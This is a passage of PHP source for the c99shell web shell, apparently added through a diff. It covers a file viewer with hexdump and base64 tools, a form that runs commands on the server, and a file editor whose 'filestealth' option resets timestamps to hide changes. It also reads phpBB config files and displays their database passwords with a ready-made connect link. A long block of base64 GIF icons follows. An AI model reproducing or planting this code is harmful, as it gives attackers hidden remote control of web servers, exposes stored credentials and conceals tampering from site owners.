href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 